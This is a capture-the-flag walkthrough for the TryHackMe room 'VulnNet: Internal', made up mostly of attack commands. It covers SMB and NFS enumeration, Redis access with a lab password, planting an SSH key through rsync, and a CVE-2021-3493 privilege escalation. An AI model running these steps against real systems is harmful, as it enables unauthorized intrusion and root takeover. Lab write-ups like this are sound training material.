TryHackMe solution: VulnNet: Internal


#1 “What is the services flag? (services.txt)

Use nmap to find open ports:

nmap -sCV

We check for available shares on the host with smbclient.

We can install with:

sudo apt-get install smbclient
-N, --no-pass,   Don't ask for a password
-L, --list=HOST, Get a list of shares available on a host
smbclient -N -L \\\\\\

There is a share named shares, and we access it with:

smbclient -N \\\\\\shares

And we have services.txt.

#2 “What is the internal flag? (“internal flag”)

View mount with:

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount

We will create a new directory and mount data to it.

mkdir conf
mount -t nfs conf

We will have a password for redis in conf/redis/redis.conf.

cat conf/redis/redis.conf | grep "pass"

Install redis-tools with:

sudo apt install redis-tools

And connect to redis.

redis-cli -h -a 'B65Hx562F@ggAZ@F'

Get the flag with:

get "internal flag"
#3 “What is the user flag? (user.txt)

Get key authlist.

lrange authlist 0 10

And we have base64 strings.


Decode it, we have the authorization for rsync.

Enumerate rsync.

rsync -av --list-only rsync://

Create new directory and copy all files to it.

mkdir rsync
rsync -av rsync://rsync-connect@ ./rsync

And we have user.txt and the username “sys-internal“.

#4 “What is the root flag? (root.txt)

We will upload a ssh key to the server with rsync:

ssh-keygen -f id_rsa
rsync -ahv ./ rsync://rsync-connect@ --inplace --no-o --no-g

Connect to ssh:

ssh sys-internal@ -i id_rsa

This room is vulnerable to CVE-2021-3493 and we can exploit it with this.

Download exploit.c and host a http server on our machine:

python3 -m http.server

In the target machine, we run:

cd /tmp
gcc exploit.c -o exploit

And we get /root/root.txt.

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